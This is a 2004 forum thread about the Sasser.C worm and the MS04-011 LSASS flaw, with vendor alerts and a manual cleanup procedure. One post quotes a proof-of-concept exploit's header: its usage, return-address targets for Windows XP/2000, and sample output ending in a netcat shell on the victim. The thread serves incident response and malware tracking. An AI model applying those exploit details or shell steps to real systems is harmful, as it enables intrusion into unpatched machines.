EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
 ·Callcentric
 ·RoadRunner Cable
·AT&T CallVantage
| Win32.Sasser.c sasser lsass
Details sketchy - Will update as I find more
»www.ealaddin.com/home/csrt/analy···0414&cf=
Aladdin rates it as low threat as of 12:41 EDT
Win32.Sasser.c, Platforms: Win 95,Win 98,Win ME,Win NT,Win 2K,Win XP
Updated on: 2 May, 2004
Arrival Form: HTTP,FTP
Type: Win32,Worm
Damage: Create files,Remote control
--
"He beheld the form of Sleeping Beauty, wondering how her supple lips would feel against his own and contemplating whether or not an Altoid was strong enough to stand up against the kind of morning breath only a hundred year's nap could create." |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| FYI, it could be what F-Secure is calling "a minor repacked variant of Sasser.A" in their Web log:
»www.f-secure.com/weblog/
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
·Callcentric
·RoadRunner Cable
·AT&T CallVantage
| reply to EGeezer
This looks like a piece of a "proof of concept" code about three days old. Is it possibly the "c" variant? I already sent the rest to someone for evaluation and will post replies as appropriate.
EG
said by partial:
* **** -ms04011-lsasrv-expl.c:
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit
* Version 0.1 coded by
*
*
* .:: [ ********* ]::.
*
*
* -------------------------------------------------------------------
* Usage:
*
* expl [connectback IP] [options]
*
* Targets:
* 0 [0x01004600]: WinXP Professional [universal] lsass.exe
* 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
* 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
*
* Options:
* -t: Detect remote OS:
* Windows 5.1 - WinXP
* Windows 5.0 - Win2k
* -------------------------------------------------------------------
*
* Tested on
* - Windows XP Professional SP0 English version
* - Windows XP Professional SP0 Russian version
* - Windows XP Professional SP1 English version
* - Windows XP Professional SP1 Russian version
* - Windows 2000 Professional SP2 English version
* - Windows 2000 Professional SP2 Russian version
* - Windows 2000 Professional SP4 English version
* - Windows 2000 Professional SP4 Russian version
* - Windows 2000 Advanced Server SP4 English version
* - Windows 2000 Advanced Server SP4 Russian version
*
*
* Example:
*
* C:\**** -ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .:: [ ********** ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Detecting remote OS: Windows 5.0
*
*
* C:\***** -ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .:: [ ************ ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
and so on ...
--
"He beheld the form of Sleeping Beauty, wondering how her supple lips would feel against his own and contemplating whether or not an Altoid was strong enough to stand up against the kind of morning breath only a hundred year's nap could create." |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| said by EGeezer  :
This looks like a piece of a "proof of concept" code about three days old. Is it possibly the "c" variant? I already sent the rest to someone for evaluation and will post replies as appropriate.
More likely that the Sasser author(s) simply incorporated this code into the worm. The other variants may be doing the same thing.
The POC code as is just opens either a remote or reverse shell, which doesn't actually infect the system being attacked.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
keith2468
Premium,MVM
join:2001-02-03
Winnipeg, MB | reply to EGeezer
Someone needs to contact the worm author and make sure he knows not to go past "Z". |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to EGeezer
Apparently, this will continue to bear watching:
»isc.incidents.org/diary.php?isc=···8eab8e7a
Excerpt:
"SasserC, reported by Joe Stewert of Security Service Provider LURHQ (http://www.lurhq.com), is currently undergoing analysis. Joe reports that SasserC spawns 1024 threads to attack other systems, and it seems poised to torch networks that are not patched for the MS04-011 vulnerabilities."
So whether the .C variant is just a repack or the thing that ISC is talking about, the situation continues to evolve. Anyone interested should keep an eye on the LURHQ site (Full Disclosure is a good place, too.)
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to EGeezer
Symantec has posted a writeup of what they are calling Sasser.C:
»www.sarc.com/avcenter/venc/data/···orm.html
1024 threads versus 128 threads...likely a hexedit and possible repacking. This actually seems pretty dense because the infected system is going to spend a lot of time just switching thread contexts. I get the feeling that whoever the hex-editor was thinks more threads means faster.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to EGeezer
Another interesting note: I went over to F-Secure because they usually have better details in their writeups (in my opinion) to look for Sasser.C. Nothing yet, but this really jumped out at me in their Sasser.B writeup:
»www.f-secure.com/v-descs/sasser_b.shtml
Excerpt:
quote:
the scanning routine starts 128 processes instead of 128 threads
That's a big difference which I don't see noted in the Symantec writeup. Guess I'll have to review other AV vendors to see what they're saying.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
DGDTrathole
join:2000-05-07
Newmarket, NH
1 edit | reply to EGeezer
from a corporate security person I deal with:
Process for cleaning a Sasser infected system
There are two ways that this can be done, in NORMAL mode, and in SAFE mode. Try the NORMAL mode first and if that doesn't work then try SAFE mode. Processes are below.
The error that you will see if you are infected with Sasser is
"System Process C:\windows\system32\lsass.exe terminated
unexpectedly with status code -107374189"
NORMAL mode
If your computer keeps rebooting, first do this:
As soon as your computer reboots and Windows loads and you are logged in, click
Start >> Run.
In the command line box, type the following:
shutdown -a
and click ok
This should stop the box from rebooting.
To end the malicious process:
Right-click on the Task Bar.
Click Task Manager.
Click the Processes tab.
Double-click the Image Name column header to alphabetically sort the
processes.
Scroll through the list and look for the following processes:
avserve.exe
any process with a name consisting of 4 or 5 digits followed by _up.exe
(eg 74354_up.exe).
If you find any such process, click it, and then click End Process.
Exit the Task Manager.
Next, go to »windowsupdate.microsoft.com/ and install all missing patches. Make sure MS04-011, Security Update for Microsoft Windows (835732), is one of those patches. Or go directly to the patch from Microsoft.
Microsoft Security Bulletin MS04-011
»www.microsoft.com/technet/securi···011.mspx
Finally, go to one of the sites below and download a Sasser Worm removal tool. Run this tool to clean the system of the Sasser worm.
SAFE mode
Restart the computer in the Safe Mode.
To do so after the Power On Self Test (POST), press and hold the F8 key.
From the Safe Mode, click Start, Run. In the Run box, type
"regedit" (without the quotes) and press enter.
Navigate to:
HKEY_LOCAL_MACHINE
+Software
+Microsoft
+Windows
+CurrentVersion
+Run
In the right-hand pane, look for any entry that might include:
avserve.exe
avserve2.exe
any process with a name consisting of 4 or 5 digits followed by _up.exe
(eg 74354_up.exe).
Delete any/all of the above entries and exit regedit.
You have now disabled the worm from running at startup, so
reboot and go back into normal mode again, and turn off ALL system restores to purge your system of any remnants.
To turn off systems restores...
Click Start, Programs, Accessories, System Tools, System Restore, System
Restore Settings, "System Restore" tab, and check the box. "Turn Off System
Restore on all drives", click "Apply" and "OK".
And delete all previous system restores by
Click Start,
Accessories,
System tools, Select the main system disk (typically Cļ
Disk Cleanup,
"More Options" tab,
"System Restore" section,
"Clean up" button,
click "Yes"
Open Windows Explorer to the
..\Windows\
..\WinNT\
..\Windows\System32\
..\WinNT\System32\
folder and DELETE *any* files called
avserve.exe
avserve2.exe
any process with a name consisting of 4 or 5 digits followed by _up.exe
(eg 74354_up.exe).
Next, go to the ..\Windows\Prefetch\ or ..\WinNT\Prefetch\
folder and find the reference to the above file/s (any reference
will be similar to: -.PF), for
example, avserve.exe-0235D8H6.pf, and DELETE it/them.
Now you can download and install the patch from Microsoft.
Microsoft Security Bulletin MS04-011
»www.microsoft.com/technet/securi···011.mspx
Update your anti-virus package and do a full system scan.
Download one of the Sasser Worm removal tools from the list below and run it to clean the system.
Sasser Removal Tools
Symantec W32.Sasser Removal Tool
»www.sarc.com/avcenter/venc/data/···ool.html
F-Secure Sasser Removal Tool
»ftp://ftp.f-secure.com/anti-virus/tool···sser.zip
»ftp://ftp.f-secure.com/anti-virus/tool···sser.exe
McAfee Sasser Removal Tool
»vil.nai.com/vil/stinger
Microsoft's Sasser Removal Tool
»www.microsoft.com/downloads/deta···ylang=en
"Step 4: Review Additional Technical Resources - If the cleaning tool above doesn't work for you, use the free worm removal tool available at your preferred antivirus software vendor's Web site"
A bit more on getting into SAFE mode
Windows 2000 / XP Users
To get into the Windows 2000 / XP Safe mode as the computer is booting press and hold your "F8 Key" which should bring up the "Windows Advanced Options Menu" as shown below. Use your arrow keys to move to "Safe Mode" and press your Enter key.
Trouble Getting into Windows 2000 or Windows XP Safe mode - If after several attempts you are unable to get into Windows 2000 or Windows XP safe mode as the computer is booting into Windows turn off your computer. When the computer is turned on the next time Windows should notice that the computer did not successfully boot and give you the safe mode screen.
Note: With some computers if you press and hold a key as the computer is booting you will get a stuck key message as the computer is booting. If this occurs instead of pressing and holding the "F8 key" tap the "F8 key" continuously until you get the startup menu.
Here¡¦s what you¡¦ll see on the screen after holding the F8 key.
Use the up and down arrow keys to move the highlight to your choice. |
|
Randy Bell
Premium
join:2002-02-24
Santa Clara, CA
| reply to psloss
This Evening's LU Covers the Worm |
said by psloss :
Symantec has posted a writeup of what they are calling Sasser.C:
»www.sarc.com/avcenter/venc/data/···orm.html
As stated in that writeup -- Covered by this evening's {May 02} liveupdate {screenshot}. 
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13) |
|
Allnew
Premium,MVM
join:2003-02-01
Denmark- EU.
clubs:
| reply to EGeezer
Sasser worms could affect 300 million computers worldwide -
Virus Alerts, by Panda Software (»www.pandasoftware.com)
Madrid, May 03 2004 - The number of computers affected by the Sasser worm
continues to rise, and the situation looks set to worsen as companies return
to work after the weekend. Luis Corrons, head of PandaLabs warns of the
threat, "Bear in mind that some 300 million computers worldwide are
vulnerable to attack by the Sasser worm, which gives an idea of the
potential scale of the threat. New variants are also likely to emerge and
for this reason, even though we launched a pre-alert at the weekend, we have
now declared a red alert."
The Sasser worms are particularly dangerous for corporate environments as
they can spread across networks in a matter of seconds. Both the French
Stock Exchange and the France Presse news agency have fallen victim to this
new malicious code and their communications were affected on Saturday.
The situation appears to be even more serious as the creators of the worm
are coordinating the continuous launch of new variants in order to increase
the probability of infection. PandaLabs has now detected the presence of
Sasser.C, which can launch up to 1024 process in memory, making it
potentially far more virulent than its predecessors.
The appearance of the new Sasser worms is seemingly directly linked to the
wave of viruses blighting the Internet over the last few months. PandaLabs
has also detected the new Netsky.AC worm, which like its predecessors
contains a message hidden inside its code. On this occasion however, there
are no insulting messages to the authors of other worms such as Bagle or
Mydoom, but instead a message directed at antivirus vendors. The message
claims that the authors are also responsible for the Sasser worms:
Hey, av firms, do you know that we have programmed the sasser virus?!?. Yeah
thats true! Why do you have named it sasser? A Tip: Compare the FTP-Server
code with the one from Skynet.V!!! LooL! We are the Skynet...'
Here is an part of the sasser sourcecode you named so, lol
Given the serious nature of the situation, Panda Software has made its
PQRemove utility available, free of charge, to all users to detect and
eliminate the viruses. Click here to access the tool.
Panda Software informs users that the new worm can be detected and
disinfected with an up-to-date antivirus, but it is important to install the
Microsoft patch to ensure that Sasser.A doesn't re-infect computers. The
vulnerability exploited by this worm was reported by Microsoft recently in
bulletin MS04-011
(»www.microsoft.com/technet/securi···011.mspx), along
with the patch. Panda Software has made the updates necessary to its
products available to clients.
More information about these and other IT threats is available from:
»www.pandasoftware.com/virus_info···lopedia/
Red alert from Panda.
This is serious i guess:(:(
--
The two most common elements in the universe are Hydrogen and stupidity.Harlan Ellison (1934 - ) |
|
Randy Bell
Premium
join:2002-02-24
Santa Clara, CA
| reply to EGeezer
Also got this from Panda today:
Virus Alerts [RED ALERT: The new Sasser.D worm aggravates the epidemic that is sweeping across the Internet - 05/03/04]
quote:
- The new Sasser.D worm aggravates the epidemic
that is sweeping across the Internet -
Virus Alerts, by Panda Software (»www.pandasoftware.com)
Madrid, May 03 2004 - PandaLabs has detected the appearance of a new variant of the Sasser worm (Sasser.D) -very similar to its predecessors- which, according to the data gathered by the multinational's International Alerts Network, has started to cause incidents.
In order to combat the effects of the epidemic triggered by the variants of the Sasser worm, Panda Software has made two new PQRemove utilities available to all users. These applications can clean infected computers and restore the configuration computers had prior to the worm's attack.
The first PQRemove is specific for networks and removes Sasser and all of its variants from any network that could have been affected. You can download at: »www.pandasoftware.com/support/
The second PQRemove application cleans every computer that could have been attacked by Sasser.D. You can download at: »www.pandasoftware.com/download/utilities/
Far from receding, the global epidemic unleashed by Sasser and its variants is expanding progressively. As expected, the number of companies whose network has been affected by these dangerous worms is increasing. According to The Daily Telegraph, Sydney's railway radio communication network has been seriously affected by a computer virus. Besides, some 300 million computers worldwide are vulnerable to attack by the Sasser worm, which gives an idea of the potential scale of the threat.
There can be no doubt about the intentions of the creators of these worms: to put as many viruses as possible in circulation in order to multiply the probability of infection. Luis Corrons, head of PandaLabs warns of the threat: "New variants of Sasser will continue to appear in the next few hours, and it will be necessary to be protected. To ensure this, users should install the Microsoft patch that corrects the vulnerability exploited by Sasser".
Panda Software informs users that the new worms can be detected and disinfected with an up-to-date antivirus, but it is important to install the Microsoft patch to ensure that Sasser.A doesn't re-infect computers. The vulnerability exploited by this worm was reported by Microsoft recently in bulletin MS04-011 (»www.microsoft.com/technet/securi···011.mspx ), along with the patch. Panda Software has made the updates necessary to its products available to clients.
Panda Software's online support center (»www.pandasoftware.com/support/) also offers help to users.
Panda Software clients can update their antivirus through the applications installed on their computers.
In addition, the users can scan their computers on line for free with the ActiveScan solution, available in the company web page »www.pandasoftware.com.
More information about these and other IT threats is available from »www.pandasoftware.com/virus_info···lopedia/
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13) |
|
kevin11
@verizon.ne
|  what if we can't get to safe mode!?
I get the following error upon start-up:
smass.exe The file could not be found and then the computer restarts before windows is even loaded.
Same problem occurs in "safe mode."
So I have no way of initiating the shutdown -a because the start menu never appears in time.
This virus is not a level 2! It caused a complete disaster in my office  . |
|
vic102482
Premium
join:2002-04-30
Upper Marlboro, MD | reply to EGeezer
Re: Win32.Sasser.c sasser lsass
Make sure to patch your machines. You dont have to worry about any varients because the basic vuneralbility is closed.
--
I tie a rope around my penis and jump from a tree, don't you wanna grow up to be just like me!!!! |
|
